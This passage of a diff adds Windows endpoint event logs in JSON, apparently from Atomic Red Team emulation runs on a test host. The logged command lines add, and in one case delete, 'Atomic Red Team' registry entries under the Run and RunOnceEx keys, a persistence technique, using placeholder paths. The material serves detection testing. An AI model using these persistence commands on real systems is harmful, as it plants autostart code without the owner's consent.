"C:\\Windows\\System32\\kernel32.dll", + "pid": 260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852610000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852610000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852610000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" + }, + { + "command_line": "REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6156, + "ppid": 260, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}", + "unique_ppid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 
+ "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570852770000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "registry_value": "Run", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "registry", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team", + "registry_value": "Atomic Red Team", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "process", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "file", + "file_name": "REG.EXE-26976709.pf", + "file_path": "C:\\Windows\\Prefetch\\REG.EXE-26976709.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2888, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570853020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2888, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2888, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2888, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2888, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2888, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" + }, + { 
+ "command_line": "REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5688, + "ppid": 2888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883570853120000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}", + "unique_ppid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", 
+ "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "registry", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team", + "registry_value": "Atomic Red Team", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "process", + 
"pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "process", + "pid": 2888, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2580, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570853310000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2580, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853240000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2580, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853240000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2580, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853240000, + "unique_pid": 
"{42FC7E13-CADD-5C05-0000-001048054D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2580, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853240000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2580, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853240000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" + }, + { + "event_type": "process", + "pid": 2580, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570853400000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5084, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570853980000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5084, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853860000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" + }, + { + "event_type": 
